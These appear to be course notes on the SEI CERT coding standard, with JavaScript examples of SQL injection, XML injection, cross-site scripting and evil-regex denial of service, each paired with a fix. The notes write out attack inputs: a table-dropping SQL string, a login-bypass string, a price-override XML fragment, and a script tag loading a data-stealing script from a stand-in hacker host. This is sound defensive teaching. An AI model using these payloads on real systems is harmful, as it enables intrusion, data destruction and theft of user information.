50.003 - Code Standards¶
Learning Outcomes¶
By the end of this unit, you should be able to
- Apply the SEI CERT Java Coding Standard to improve the security level of a software system
Coding Standard¶
A coding standard is a common guideline that a group of software engineers follows so as to
- have a uniform structure across most of the code
- improve readability
- improve referenceability
- improve maintainability
- minimize exploitability
For example, we find
- https://google.github.io/styleguide/
- https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java
SEI CERT Java Coding Standard¶
Let's take the SEI CERT Java Coding Standard as an example. It consists of a set of rules that are meant to provide normative requirements for code. Each rule is associated with metrics for severity (low, medium, and high), likelihood (unlikely, probable, and likely), and remediation cost (high, medium, and low). Conformance to a rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.
For example, we find a subset of the rules as follows,
- Input validation and data sanitization
- Object orientation (not relevant for now since we focus on JavaScript, but you are strongly encouraged to read up on it)
- Locking and thread safety (covered in an earlier unit in week 6)
- Visibility and atomicity (not covered in this course)
Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those that are applicable to both languages.
Input Validation and Data Sanitization¶
Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized.
For example, we find the following rules in this category
- IDS00-J. Sanitize untrusted data passed across a trust boundary
- IDS01-J. Normalize strings before validating them
- IDS11-J. Eliminate non-character code points before validation
IDS00-J. Sanitize untrusted data passed across a trust boundary¶
The main idea is simple: given data provided by a third party, we should sanitize it to ensure that it is not malicious.
SQL Injection¶
An example of an attack that exploits such data is SQL injection.
Suppose we have the following code
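A minimal sketch of such a function is shown below. It assumes a connection object con that exposes query(sql, callback) in the style of the Node.js mysql driver. The column names username and password and the helper buildLoginQuery are hypothetical and serve only to make the string concatenation visible.

```javascript
// Hypothetical helper: builds the SQL text by plain string concatenation.
// The column names `username` and `password` are assumptions.
function buildLoginQuery(un, pw) {
  return "SELECT * FROM db_user WHERE username='" + un +
         "' AND password='" + pw + "'";
}

// Vulnerable login: untrusted `un` and `pw` flow directly into the SQL text.
// `con` is assumed to expose query(sql, callback).
function login(con, un, pw, callback) {
  con.query(buildLoginQuery(un, pw), callback);
}
```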
The function login takes a database connection object con, the username un, and the password pw, and tries to search for the user record in the db_user table.
Note that un and pw are input strings provided by external parties, who may be normal users or malicious users.
A malicious user might set un to "" and pw to "' OR '0'='0". The condition '0'='0' is always true, so the resulting query matches every record in the db_user table. As a result, the user can log in without giving a valid user name and password.
In the worst case, a malicious user could supply un = "" and pw = "'; drop table db_user; --". The injected text closes the password literal and appends a second statement that drops the table. As a result, all the records in the db_user table are deleted.
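To make both attacks concrete, the sketch below prints the query text that string concatenation would produce for each input. The query template and column names are assumptions, since they depend on how login builds its SQL.

```javascript
// Hypothetical query builder using plain concatenation (assumed column names).
function buildLoginQuery(un, pw) {
  return "SELECT * FROM db_user WHERE username='" + un +
         "' AND password='" + pw + "'";
}

// Input that turns the WHERE clause into an always-true condition.
const bypass = buildLoginQuery("", "' OR '0'='0");
console.log(bypass);
// SELECT * FROM db_user WHERE username='' AND password='' OR '0'='0'

// Input that smuggles in a second, destructive statement.
const destructive = buildLoginQuery("", "'; drop table db_user; --");
console.log(destructive);
// SELECT * FROM db_user WHERE username='' AND password=''; drop table db_user; --'
```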
To prevent SQL injection attacks, a Prepared Statement should be used.
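A sketch of a safer version follows. It assumes the driver offers a query(sql, values, callback) overload that accepts ? placeholders, as the Node.js mysql driver does; the column names are again hypothetical.

```javascript
// Safer login: the SQL text is fixed and the untrusted values are passed
// separately, so the driver handles them as data rather than as SQL.
// `con` is assumed to expose query(sql, values, callback).
function login(con, un, pw, callback) {
  const sql = "SELECT * FROM db_user WHERE username = ? AND password = ?";
  con.query(sql, [un, pw], callback);
}
```

With this shape, an input such as "' OR '0'='0" never becomes part of the SQL text itself.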
In the updated version, we use an overloaded query() to define a prepared statement that manages the query. The ? placeholders allow the programmer to indicate where the untrusted input should be inserted after being sanitized. Via the prepared statement, we sanitize the untrusted input strings before inserting them into the statement.
XML Injection¶
Besides SQL injection, untrusted XML data fragments pose threats to system security too.
Consider the following JavaScript program
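A minimal sketch of such a program is given here. The function name createOrderXML, the item description, and the element names are assumptions; the price 999.0 follows the discussion of this example.

```javascript
// Builds the XML for one shopping item by embedding the untrusted quantity
// string directly into a trusted template (this is the vulnerable part).
function createOrderXML(qty) {
  return "<item>" +
         "<description>Widget</description>" +
         "<price>999.0</price>" +
         "<quantity>" + qty + "</quantity>" +
         "</item>";
}

console.log(createOrderXML("1"));
// <item><description>Widget</description><price>999.0</price><quantity>1</quantity></item>
```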
With a benign input such as qty = "1", the resulting XML document, which captures the user's shopping item, will be processed by the addToCart() function.
Suppose a malicious user invokes the function with a rigged input qty = "1</quantity><price>1.0</price><quantity>1"
which results in the following XML document
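Assuming the template wraps a description, a price of 999.0, and the quantity in an item element (the element names are hypothetical), the rigged input yields a document with two price elements. The helper lastPrice is also hypothetical; it imitates a consumer that lets later elements overwrite earlier ones.

```javascript
// Same vulnerable template as assumed for the benign case.
function createOrderXML(qty) {
  return "<item>" +
         "<description>Widget</description>" +
         "<price>999.0</price>" +
         "<quantity>" + qty + "</quantity>" +
         "</item>";
}

const rigged = createOrderXML("1</quantity><price>1.0</price><quantity>1");
console.log(rigged);
// <item><description>Widget</description><price>999.0</price><quantity>1</quantity><price>1.0</price><quantity>1</quantity></item>

// Hypothetical consumer: scans price elements in order and keeps the last one.
function lastPrice(xml) {
  let price = null;
  for (const m of xml.matchAll(/<price>([^<]*)<\/price>/g)) {
    price = m[1];
  }
  return price;
}

console.log(lastPrice(rigged)); // 1.0
```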
If the addToCart() method processes the elements top to bottom in order, the injected price element might override the price value 999.0 with 1.0.
The fix to this issue is similar to the one for SQL injection. What is required is to sanitize the input string before embedding it into the XML template, which is treated as trusted data.
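One possible sanitization, sketched here under the assumption that a quantity must be a non-negative integer, is to validate the input against an anchored whitelist pattern before embedding it. The function and element names are hypothetical.

```javascript
// Validates the untrusted quantity before it reaches the trusted template.
function createOrderXML(qty) {
  // Accept only strings made up entirely of ASCII digits.
  if (typeof qty !== "string" || !/^[0-9]+$/.test(qty)) {
    throw new Error("Invalid quantity: " + qty);
  }
  return "<item>" +
         "<description>Widget</description>" +
         "<price>999.0</price>" +
         "<quantity>" + qty + "</quantity>" +
         "</item>";
}

console.log(createOrderXML("1")); // accepted

try {
  createOrderXML("1</quantity><price>1.0</price><quantity>1");
} catch (e) {
  console.log(e.message); // the rigged input is rejected
}
```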
IDS01-J. Normalize strings before validating them¶
Cross Site Scripting¶
The third example of a security loophole caused by using untrusted data in a trusted context is cross-site scripting (XSS).
Consider the following app
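A sketch of such an app is shown below. To stay self-contained it omits the web framework and the database: messages is a hypothetical in-memory stand-in for the database, and showMessage follows the (req, res) handler shape used by Express, calling res.send with the generated page.

```javascript
// Hypothetical stand-in for the message table in the database.
const messages = { 1: "hello" };

// Embeds the stored message into the page without any sanitization.
function renderPage(message) {
  return "<html><body><div>" + message + "</div></body></html>";
}

// Express-style route handler: looks up the message and sends the page.
function showMessage(req, res) {
  const message = messages[req.params.id];
  res.send(renderPage(message));
}
```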
Suppose the message created by a normal user and recorded in the database is "hello". The route handler then returns an HTML page that simply displays hello.
However, the threat surfaces when the message retrieved from the database is
"<script src='http://hacker-network.io/stealuserinfo.js' type='text/javascript'></script> "
because the script element is embedded verbatim in the resulting HTML document. When the page is loaded in the victim's browser, the hacker's script is executed and can extract information from the victim's machine.
One way to address this issue is to sanitize the record retrieved from the database.
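For example, the record could be passed through an HTML-escaping function before it is embedded in the page. The helper below is a hypothetical sketch, not a complete sanitizer; production code would typically rely on a vetted library or a templating engine that escapes by default.

```javascript
// Replaces the characters that have special meaning in HTML with entities.
// The ampersand must be handled first so that later entities are not re-escaped.
function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(escapeHtml("<script>alert(1)</script>"));
// &lt;script&gt;alert(1)&lt;/script&gt;
```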
However, this might not cover all edge cases. Suppose the malicious user uses Unicode variants of < and >, namely \uFE64 and \uFE65.
This motivates the need to normalize Unicode representations into their ASCII equivalents before sanitization.
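In JavaScript, String.prototype.normalize with the NFKC form maps compatibility characters such as \uFE64 and \uFE65 to < and >. The sketch below uses a hypothetical validator that rejects angle brackets and suggests that it only catches the disguised input once the string has been normalized.

```javascript
// Hypothetical check used by a validator: does the text contain < or >?
function containsAngleBrackets(text) {
  return /[<>]/.test(text);
}

// Normalize first, then validate the normalized form.
function isSafeMessage(message) {
  const normalized = message.normalize("NFKC");
  return !containsAngleBrackets(normalized);
}

const disguised = "\uFE64script\uFE65";
console.log(containsAngleBrackets(disguised)); // false: the raw check is bypassed
console.log(disguised.normalize("NFKC"));      // <script>
console.log(isSafeMessage(disguised));         // false: caught after normalization
```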
Using Regex to sanitize input¶
A regular expression (regex) is a commonly used domain-specific language for string and data matching. It has a compact syntax and lightweight implementations, and most languages come with library support for regex. For instance, in JavaScript, we define a regex object with a literal of the form /pattern/flags.
Then we can run it against an input string, for example with the string's match() method.
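As a sketch, a regex object can be written as a literal or built with the RegExp constructor, and then applied with methods such as test() or match(). The pattern and input here are arbitrary examples.

```javascript
const literal = /ab/;                 // regex literal
const constructed = new RegExp("ab"); // equivalent pattern built from a string

console.log(literal.test("cab"));         // true
console.log("cab".match(constructed)[0]); // ab
```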
Here are some basic examples of constructing regex patterns.
Matching a single expression¶
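A snippet of the following shape fits the description; the use of match() and the variable name m1 are assumptions.

```javascript
const r1 = /a/;
const m1 = "aaa".match(r1); // search for the first match only
console.log(m1[0], m1.index, m1.input, m1.groups); // a 0 aaa undefined
```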
In the above code snippet, r1 is a regex that matches a character a. In the second line, we match the input string aaa with the pattern. The result contains the part that the regex matches, which is 'a', its index, the input, and the groups if available. Note that it only searches for the pattern once in the input string.
Matching a single expression globally¶
If we want the regex to look for matches "globally" over the input, we add g to the flags field.
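A small sketch, assuming the match() method is used and with r2 as a hypothetical name:

```javascript
const r2 = /a/g;              // the g flag asks for every match, not just the first
const all = "aaa".match(r2);
console.log(all);             // [ 'a', 'a', 'a' ]
```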
Case insensitivity¶
If we would like to ignore case during the match, we add i to the flags field.
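For instance (the variable names are hypothetical):

```javascript
const caseSensitive = /a/;
const caseInsensitive = /a/i; // the i flag ignores letter case

console.log("A".match(caseSensitive));      // null
console.log("A".match(caseInsensitive)[0]); // A
```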
Anchored match¶
Sometimes we would like the regex to match the input exactly from its start to its end. To do so, we anchor the pattern: ^ denotes the start of the input and $ denotes the end.
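A brief sketch contrasting an anchored pattern with an unanchored one (the patterns and inputs are arbitrary examples):

```javascript
const anchored = /^aaa$/; // the whole input must be exactly aaa
const unanchored = /aaa/; // aaa may appear anywhere in the input

console.log(anchored.test("aaa"));     // true
console.log(anchored.test("baaab"));   // false
console.log(unanchored.test("baaab")); // true
```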
Character class match¶
If we want to match any one of a set of alternative characters, we list them inside square brackets, e.g. /[ab]/ matches either a or b.
Note that a ^ at the start of a [] means negation, e.g. /[^ab]/ matches any character except a and b.
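The two kinds of character class can be sketched as follows; the g flag is added here only to list every matching character.

```javascript
const eitherAOrB = /[ab]/g;   // matches a or b
const neitherANorB = /[^ab]/g; // matches any character other than a and b

console.log("abc".match(eitherAOrB));   // [ 'a', 'b' ]
console.log("abc".match(neitherANorB)); // [ 'c' ]
```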
Kleene's star¶
Kleene's star allows us to repeat a sub-regex pattern zero or more times. (Note that this is different from the global flag g, which produces a list of matches.)
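The difference can be sketched as follows (the input is an arbitrary example):

```javascript
const star = /a*/;  // one match that spans a run of zero or more a characters
const each = /a/g;  // a list of separate single-character matches

console.log("aaab".match(star)[0]); // aaa
console.log("aaab".match(each));    // [ 'a', 'a', 'a' ]
```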
Reference group¶
Sometimes, we would like to match and extract parts of the input. We use parentheses to mark the sub-part that we would like to extract.
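For instance, a pattern such as /a(a*)/ captures whatever follows the first a. The pattern and the variable names are assumptions chosen to illustrate the idea.

```javascript
const r = /a(a*)/;         // the parentheses capture the run of a after the first a
const m = "aaa".match(r);

console.log(m[0]); // aaa  (the whole match)
console.log(m[1]); // aa   (the captured group)
```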
In the above, we match and then extract the remaining a characters after the first a.
Note that we can add a referenced Kleene's star regex with a global flag. The following will produce an initialization error.
More on repetition¶
Besides Kleene's star, we have the following operators that define different constraints on repetition.
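Commonly used repetition operators in JavaScript include +, ?, {n}, {n,}, and {n,m}. The sketch below illustrates each on the arbitrary input aaa; it is not meant as an exhaustive list.

```javascript
const input = "aaa";

console.log(input.match(/a+/)[0]);     // aaa  (+ : one or more)
console.log(input.match(/a?/)[0]);     // a    (? : zero or one)
console.log(input.match(/a{2}/)[0]);   // aa   ({n} : exactly n times)
console.log(input.match(/a{2,}/)[0]);  // aaa  ({n,} : at least n times)
console.log(input.match(/a{1,2}/)[0]); // aa   ({n,m} : between n and m times)
console.log(/a+/.test(""));            // false, since + needs at least one a
```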
Pitfall of using Regex as input sanitizer¶
There are many different algorithms for implementing regex matching. Unfortunately, many existing libraries use a backtracking approach when performing the match. This leads to a possible security threat to the software system, e.g.
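A sketch of the problem, using an assumed pattern with a nested star and an input that can never match because it lacks the final h. The input length is deliberately kept small so that the example finishes quickly; on a backtracking engine, the running time is expected to grow sharply as the length increases.

```javascript
const evil = /(a*)*h/;                 // nested Kleene's star followed by h
const input = "a".repeat(20) + "g";    // many a characters, but no h at the end

const start = Date.now();
const matched = evil.test(input);      // forces the engine to exhaust its alternatives
const elapsedMs = Date.now() - start;

console.log(matched); // false
console.log("elapsed ms:", elapsedMs); // varies by machine and engine
```

Raising the repeat count by a few characters at a time is one way to observe how quickly the matching time grows.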
The above takes a substantial amount of time to complete because of the nested Kleene's star in (a*)*. The backtracking algorithm repeatedly backtracks and searches for alternatives that would satisfy the match with the final h character, even though there are exponentially many paths to explore.
In general, when a nested repeatable regex accepts an empty input, it is problematic and is classified as an evil regular expression.
For more details, refer to